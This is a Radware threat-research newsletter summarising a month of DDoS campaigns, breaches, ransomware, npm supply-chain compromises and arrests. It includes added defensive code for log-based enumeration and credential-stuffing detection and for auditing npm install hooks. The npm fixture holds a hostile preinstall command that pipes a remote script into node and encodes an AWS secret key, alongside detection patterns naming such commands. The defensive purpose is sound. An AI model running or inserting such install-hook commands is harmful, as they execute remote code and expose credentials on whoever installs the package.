
Threat Researchers Newsletter – Issue #3
Welcome once again to all our new subscribers. We thank you for your support! This newsletter aims to give our followers a summary of the notable cyber events that happen every month. If there is an event that we miss or one you want us to cover on Threat Researchers Live, please reach out via our Telegram chat channel, Radware Research Chat.
We would also like to take this time to announce that Radware will be hosting a webinar, Cyber Warfare, Protecting Applications and the Networks that Deliver them, from a Ukrainian perspective on October 6th. Join Daniel Smith and Eva Abergel from Radware as they talk about lessons learned and how Ukraine is planning ahead for the future of cyber war with Victor Zhora, Deputy Chairman and Chief Digital Transformation Officer for Ukraine’s State Service of Special Communications and Information Protection (SSSCIP). Register now!
Cyber Legions
Pro-Russian DDoS Attacks
At the beginning of September, Japan was hit by a series of DDoS attacks by the pro-Russian hacktivist group Killnet after the Japanese government protested Moscow's decision to terminate the agreement on facilitated visits to the islands of Kunashir, Iturup, and the Lesser Kuril ridge. Targets included Japan Credit Bureau, Mixi, Niconico Douga, and a number of government services.
Avast published a report about a pro-Russian hacktivist group, NoName057(16). This group is known to target governments, news agencies, armies, suppliers, telecommunications companies, and financial institutions with DDoS attacks, both in Ukraine and in supporting countries such as Estonia, Lithuania, Norway, and Poland. The group uses a botnet named Bobik, which is distributed via RedLine Stealer.
Suggested Articles:
Hacker Group Supporting Russia Cyber Attacks on Japan Government Sites
Pro-Russian Group Targeting Ukraine Supporters with DDoS Attacks
Pro-Ukrainian Hackers Cause Traffic in Moscow
It was reported by Vice that pro-Ukrainian hacktivists hacked Yandex’s Taxi service and sent dozens of taxis to the Fili district in Moscow, creating a massive traffic jam.
Suggested Articles:
Hackers Create Traffic Jam in Moscow by Ordering Dozens of Taxis at Once Through App
Evolving Landscape
Google TAG reported that some members of UAC-0098 are former Conti threat actors. UAC-0098 has traditionally delivered the IcedID trojan, which is then leveraged for hands-on-keyboard ransomware attacks. The group is now targeting Ukrainian government agencies as well as European humanitarian and non-profit organizations. It is reportedly aligned with Russian government-backed attackers and further blurs the line between financially motivated and government-backed operations in Eastern Europe.
Following the Russian mobilization news, Victor Zhora, Deputy Chairman and CDTO of the State Service of Special Communication and Information Protection of Ukraine (SSSCIP), asked via Twitter if new skilled conscripts will join the Russian cyber offensive to escalate cyber aggression to new levels.
Suggested Articles:
Initial Access Broker Repurposing Techniques in Targeted Attacks Against Ukraine
Russian Hacktivist a Front for APT28?
Mandiant is reporting that multiple threat groups are working in support of Russian interests. Admins of XakNet, Infoccentr, and CyberArmyofRussia_reborn reportedly coordinate operations with Russia's Main Intelligence Directorate (GRU). These groups primarily conduct DDoS attacks and leak stolen data, but their activity is typically discovered days after APT28 toolkits have been found on the victims' networks.
Suggested Articles:
GRU: Rise of the (Telegram) MinIOns
Nation-State
Iran in Geopolitical Hot Seat
OpIran was launched after Mahsa Amini died in the custody of Iran's morality police, who had detained her for allegedly wearing her hijab too loosely. Authorities claimed she died of natural causes, but others maintain she was killed. Iranians protested across the country, and in response the Iranian government shut down the internet, which drew a swarm of hacktivists working to restore communication services, DDoS the Iranian government, and expose government violence.
In addition to OpIran, the US Treasury sanctioned 10 IRGC-affiliated actors for their role in ransomware attacks associated with APT35, aka Charming Kitten, and the US government attributed a series of attacks against Albania to Iran.
Suggested Articles:
OpIran – Anonymous Hits Iranian State Sites, Hacks Over 300 CCTV Cameras
Iranian State Actors Conduct Cyber Operations Against the Government of Albania
Treasury Sanctions IRGC-Affiliated Cyber Actors for Roles in Ransomware Activity
Hungary Eyes Legal DDoS Attacks
The Hungarian Communication Association (MKSZ) has suggested that it wants to counter IPTV piracy with legal DDoS attacks. The association is setting up a round-table discussion with domestic stakeholders to consider launching DDoS attacks against illegal IPTV providers while enjoying protection under the law. The attacks would theoretically be carried out from a designated IP range marked for legal DDoS traffic, in order to degrade illegal IPTV/VoD services.
Suggested Articles:
Hungary Eyes Legal DDOS Attacks to Combat Piracy
Botnets
Chaos Replaces Kaiji
There is a new botnet on the block, and its name is Chaos. Chaos is multi-purpose malware written in Go. It targets both Windows and Linux devices and is considered an evolution of the Kaiji botnet discovered back in 2020. The malware can exploit known vulnerabilities, scan targeted systems, and automatically move laterally and propagate. Its second-stage payloads include DDoS and crypto-mining modules.
Suggested Articles:
New Chaos Malware Infects Windows, Linux Devices for DDoS Attacks
Gaming
Blizzard Suffers DDoS Attacks
Last month it was Final Fantasy; this month it was Blizzard games. An unknown threat actor launched a series of DDoS attacks against Blizzard's authentication servers. The attack resulted in a three-and-a-half-hour outage for Call of Duty, World of Warcraft, and Overwatch.
Suggested Articles:
DDOS Attack Takes Major Activision Blizzard Games Offline for Hours
2K Games Help Desk Targeted
The help desk at 2K Games was leveraged to target customers with a fake support ticket pushing RedLine Stealer via embedded links. 2K is a subsidiary of Take-Two Interactive, as is Rockstar.
Suggested Articles:
2K Games Says Hacked Help Desk Targeted Players with Malware
Rampages
Uber and Rockstar Hacked
Uber and Rockstar were both hacked in September, and a British teenager has since been arrested for the intrusions. He reportedly compromised Uber by buying valid credentials on a darknet marketplace and using them to gain access to the network. The Uber compromise did not result in a data leak, but the Rockstar intrusion did: the teenager leaked details of the unreleased game Grand Theft Auto 6. He has now breached bail twice since his original arrest in December 2021.
Suggested Articles:
Optus Breach: Australia’s Equifax Moment
Optus, Australia's second-largest telecom provider, was breached, and the threat actor put 11.2 million records up for sale on the darknet forum Breached. The breach resulted from the threat actor scraping data from an unauthenticated API endpoint. The data included customer names, dates of birth, phone numbers, email addresses, and driver's license or passport numbers. The Australian Federal Police launched Operation Hurricane in response, and the threat actor has since removed the listing.
Suggested Articles:
When All Else Fails… Lulz
A couple going by the name TeaPea hacked into the InterContinental Hotels Group (IHG) network. Described as a couple from Vietnam, they were able to access email, server directories, and Teams. After social engineering an employee and bypassing MFA, the couple failed to deploy a ransomware payload. Instead of giving up, they deleted files as they were being pushed out of the network.
Suggested Articles:
IHG Hack: ‘Vindictive’ Couple Deleted Hotel Chain Data for Fun
Ransomware
LockBit Drama
LockBit has had an entertaining month. The group's spokesman, LockBitSupp, offered $1,000 to anyone who got a LockBit logo tattoo, but it is still unknown whether the threat actor paid up. LockBit also paid a $50,000 bounty to another threat actor who decrypted a locked file. Additionally, a LockBit developer leaked the group's latest builder, leaving many researchers worried that other opportunists will use the builder for their own campaigns.
Suggested Articles:
LockBit Ransomware Builder Leaked Online by “Angry Developer”
DDoS Attacks Target Threat Actors
Last month LockBit was the target of DDoS attacks after threatening to leak Entrust's data. This month, threat actors launched DDoS attacks against Cobalt Strike servers belonging to former Conti members. Like the LockBit DDoS, this one carried embedded messages, but this time demanding an end to the war in Ukraine. Several other ransomware groups, including ALPHV, LV, Hive, Everest, BianLian, Yanluowang, Snatch, Lorenz, Ragnar Locker, and Vice Society, also experienced service degradation in September.
Suggested Articles:
Ransomware Gang’s Cobalt Strike Servers DDoSed with Anti-Russia Messages
Vice Society Targeting Educational Vertical
Vice Society, a ransomware group that disproportionately targets the education vertical, compromised the Los Angeles Unified School District (LAUSD) in September. Its recent victims also include Sierra College, Samuel Ryder Academy, and SOAS University of London.
Suggested Articles:
The Second Largest U.S. School District LAUSD Hit by Ransomware
Back to School
Educational Vertical Under Attack
Seesaw, a popular messaging app used by educational institutions, was hacked right as students returned to the classroom. Seesaw was the victim of a credential-stuffing attack in which a threat actor used compromised accounts to send an inappropriate image to other users on the platform.
Suggested Articles:
Popular School Messaging App Hacked to Send Explicit Image to Parents
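The Optus and Seesaw incidents above share a detection story: in one, a single client walks an unauthenticated API through many record IDs; in the other, a single client tries many different usernames against a login page. The following is an added example (not code from the newsletter, Optus, or Seesaw) showing both detections run over constructed access-log lines in a simplified, hypothetical format; the `/api/customers/<id>` and `/login` paths, thresholds, and IP addresses are assumptions for illustration.

```javascript
// Added example: two detections over web access logs.
// (1) detectEnumeration: one client fetching many distinct, mostly sequential
//     record IDs from an API endpoint with no credential (Optus-style scraping).
// (2) detectCredentialStuffing: one client failing logins across many distinct
//     usernames (Seesaw-style credential stuffing).
// Log format is constructed for this example:
//   <client_ip> <method> <path> <status> auth=<yes|no> [user=<name>]

function parseLine(line) {
  const m = line.match(/^(\S+) (\S+) (\S+) (\d{3}) auth=(yes|no)(?: user=(\S+))?$/);
  if (!m) return null; // unparseable lines are ignored rather than crashing the rule
  return { ip: m[1], method: m[2], path: m[3], status: Number(m[4]),
           authenticated: m[5] === "yes", user: m[6] || null };
}

// Rule 1: unauthenticated enumeration of /api/customers/<id>.
// Alerts on an IP that fetched at least `minIds` distinct IDs without auth,
// where at least `minSeqRatio` of its consecutive requests step the ID by 1.
function detectEnumeration(lines, { minIds = 5, minSeqRatio = 0.8 } = {}) {
  const byIp = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r || r.authenticated) continue;
    const idm = r.path.match(/^\/api\/customers\/(\d+)$/);
    if (!idm) continue;
    if (!byIp.has(r.ip)) byIp.set(r.ip, []);
    byIp.get(r.ip).push(Number(idm[1]));
  }
  const alerts = [];
  for (const [ip, ids] of byIp) {
    const distinct = new Set(ids).size;
    if (distinct < minIds) continue;
    let seq = 0;
    for (let i = 1; i < ids.length; i++) if (ids[i] - ids[i - 1] === 1) seq++;
    const ratio = seq / (ids.length - 1);
    if (ratio >= minSeqRatio) alerts.push({ ip, distinctIds: distinct, sequentialRatio: ratio });
  }
  return alerts;
}

// Rule 2: credential stuffing against POST /login.
// Alerts on an IP that produced 401s for at least `minUsers` distinct usernames.
function detectCredentialStuffing(lines, { minUsers = 5 } = {}) {
  const byIp = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r || r.path !== "/login" || r.method !== "POST" || r.status !== 401 || !r.user) continue;
    if (!byIp.has(r.ip)) byIp.set(r.ip, new Set());
    byIp.get(r.ip).add(r.user);
  }
  return [...byIp]
    .filter(([, users]) => users.size >= minUsers)
    .map(([ip, users]) => ({ ip, distinctUsers: users.size }));
}

// Constructed sample log (addresses from the documentation ranges).
const SAMPLE_LOG = [
  // scraper walking IDs 1000..1006 with no credential
  ...[1000, 1001, 1002, 1003, 1004, 1005, 1006].map(
    (id) => `198.51.100.7 GET /api/customers/${id} 200 auth=no`),
  // legitimate authenticated user fetching their own record twice
  "192.0.2.15 GET /api/customers/4821 200 auth=yes user=alice",
  "192.0.2.15 GET /api/customers/4821 200 auth=yes user=alice",
  // stuffing: one IP, six different usernames, all rejected
  ...["ann", "bob", "cara", "dan", "eve", "finn"].map(
    (u) => `203.0.113.42 POST /login 401 auth=no user=${u}`),
  // a real user mistyping once, then succeeding
  "192.0.2.99 POST /login 401 auth=no user=gus",
  "192.0.2.99 POST /login 200 auth=yes user=gus",
];

console.log("enumeration:", detectEnumeration(SAMPLE_LOG));
console.log("stuffing:", detectCredentialStuffing(SAMPLE_LOG));
```

Both rules key on the client IP only for simplicity; in production you would also group on a session or device fingerprint, since scrapers and stuffing tools rotate through proxy pools (the RSOCKS service covered later in this issue is exactly that kind of infrastructure). The enumeration rule is a detection, not a fix: the actual remediation for an Optus-style endpoint is requiring authentication and an ownership check on every record lookup, and using non-sequential identifiers so the ID space cannot be walked.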
Supply Chain
Npm Packages Compromised, Again
Malicious versions of npm packages published under the account of the crypto exchange dYdX were found on the registry. The affected packages are used by at least 44 cryptocurrency projects, and the malicious versions contained code that ran an infostealer from a preinstall script, so simply installing the package on a system was enough to compromise it.
Suggested Articles:
npm Packages Used by Crypto Exchanges Compromised
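The preinstall hook is the whole trick in the dYdX case: npm runs `preinstall`, `install`, and `postinstall` scripts automatically with the installing user's privileges. The following is an added example (not code from the newsletter or from dYdX) that audits a `package.json` for lifecycle hooks and flags commands with patterns typical of install-time malware; the package contents, names, and patterns are constructed for illustration.

```javascript
// Added example: audit a package.json for npm lifecycle scripts that execute
// automatically on install, and flag ones that look like install-time malware.
// Package contents and the suspicious-pattern list are constructed for this demo.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Patterns commonly seen in malicious install hooks: a remote fetch piped into
// an interpreter, inline node eval, base64-obfuscated payloads, environment
// variable access, and reads of credential files. Legitimate hooks rarely need these.
const SUSPICIOUS = [
  /\b(curl|wget)\b.*\|\s*(sh|bash|node)\b/,
  /\bnode\s+-e\b/,
  /base64/i,
  /\beval\(/,
  /process\.env/,
  /\$\w*(SECRET|TOKEN|KEY)\w*/,
  /\/etc\/passwd|\.ssh\/|\.aws\//,
];

// Returns one finding per lifecycle hook present. Severity is "high" when the
// command matches any suspicious pattern, otherwise "info": hooks such as
// `node-gyp rebuild` are common and legitimate, so they are reported, not blocked.
function auditLifecycleScripts(pkgJsonText) {
  const pkg = JSON.parse(pkgJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = String(scripts[hook]);
    const matched = SUSPICIOUS.filter((re) => re.test(command)).map((re) => re.source);
    findings.push({
      package: `${pkg.name}@${pkg.version}`,
      hook,
      command,
      matched,
      severity: matched.length > 0 ? "high" : "info",
    });
  }
  return findings;
}

// Constructed samples: a benign native-build hook and a hostile preinstall that
// pipes a remote script into node and leaks a cloud secret. Hypothetical names.
const BENIGN = JSON.stringify({
  name: "native-widget",
  version: "1.2.3",
  scripts: { install: "node-gyp rebuild", test: "mocha" },
});

const HOSTILE = JSON.stringify({
  name: "example-crypto-lib",
  version: "4.0.1",
  scripts: {
    preinstall: "curl -s http://203.0.113.10/ci.js | node; echo $AWS_SECRET_ACCESS_KEY | base64",
    build: "tsc",
  },
});

console.log(JSON.stringify(auditLifecycleScripts(BENIGN), null, 2));
console.log(JSON.stringify(auditLifecycleScripts(HOSTILE), null, 2));
```

Run this over the `package.json` of every dependency in `node_modules` (or over the tarball before you install it) rather than only the top-level project, since the hook that matters is the one in the dependency. For CI and build hosts, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) disables lifecycle hooks entirely, at the cost of breaking packages that genuinely need a native build step, which you can then allow-list explicitly.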
Mitigating the Sun, Part 2
The Sun is The Final Boss of the Internet
In September, Twitter lost a critical data center in California due to an extreme heat wave. The heat wave did not affect Twitter's data centers in Atlanta and Portland, but many observed that if a second data center had failed, Twitter would have gone offline entirely. This follows an outage last month in which an extreme heat wave in the United Kingdom took down an Oracle data center.
Suggested Articles:
Extreme California Heat Knocks Key Twitter Data Center Offline
Energy Emergency Locks Thousands Out of Their Thermostats
In Colorado, 22,000 people found themselves locked out of their smart thermostats after an extreme heat wave hit the state. The electric company, Xcel, usually gives users a chance to override such lockouts but did not offer that option this time. In its defense, the company stated that the affected users had signed up for a program that allows the company to control the thermostat during an energy emergency in exchange for a $25 credit for each year they remain in the program.
Suggested Articles:
Thousands of Xcel Customers Locked Out of Thermostats During ‘Energy Emergency’
Abductions
Cyber Slavery in Cambodia
Cambodian authorities uncovered a forced-labor cybercriminal syndicate. Over the 5-day operation, officers found more than 130 cyber-enslaved people who had been lured from Southeast Asian countries via social media with promises of lucrative careers. Once in the country, victims had their passports confiscated and were forced to run dating and cryptocurrency scams. Traffickers were reportedly offered $17,000 per victim.
Suggested Articles:
Cambodian Authorities Crack Down on Cyber Slavery Amid International Pressure
Hacker Kidnapped by Rival Cyber Gang
Foreshadow, a known member of a SIM-swapping threat group, was kidnapped, beaten, and allegedly shot by a rival gang. The hacker was held for a $200,000 ransom and was rumored to have died from a gunshot wound. Foreshadow is now in federal custody, but the event highlights a growing tide of violence-as-a-service in the cybercrime community.
Suggested Articles:
SIM Swapper Abducted, Beaten, Held for $200k Ransom
Raids and Arrests
WT1SHOP Seized
A popular darknet marketplace, WT1SHOP, was seized by Portuguese authorities. The marketplace had over 100,000 users, 94 sellers, and two admins, and offered over 5.85 million records for sale. It is the same kind of marketplace the Uber hacker used to purchase compromised valid credentials.
Suggested Articles:
Website Selling Stolen Login Credentials and Other Personally Identifying Information is Seized
RSOCKS Admin Arrested
In September, we learned that the admin of RSOCKS, a proxy-for-hire botnet, had been arrested a month before US authorities took down his service. The admin was detained in May while on vacation in Bulgaria and is currently awaiting extradition to the United States.
Suggested Articles:
Risky Biz News: US Ransomware Task Force to go After Ransomware Top Dogs
Kaseya Hacker Admits Guilt
I saved the best for last! The Kaseya hacker, Yaroslav Vasinskyi, has pleaded guilty in US court for his role in the 2021 Kaseya hack. Vasinskyi is a Ukrainian national and a member of the REvil ransomware group.
Suggested Articles:
Jeff Stone Links to US Court Filings Related to The Kaseya Hack
Suggested Newsletters
Are you looking for additional resources and news related to the current threat landscape? Check out these security newsletters suggested by our researchers at Radware.
- Risky Business – https://risky.biz/
- This Week in Security – https://this.weekinsecurity.com/
- Zero Day – https://zetter.substack.com/
- The Info Op – https://grugq.substack.com/
- SANS @RISK – https://www.sans.org/newsletters/at-risk/
- Masafumi Negishi – https://www.getrevue.co/profile/masafuminegishi
Join the conversation!
Do you have additional insight or comments? Join the conversation with our researchers at Radware on Telegram.
https://t.me/RadwareResearchChat
This is a Security Bloggers Network syndicated blog from Threat Researchers Newsletter authored by Radware Research. Read the original post at: https://radware.substack.com/p/threat-researchers-newsletter-issue-3-1338536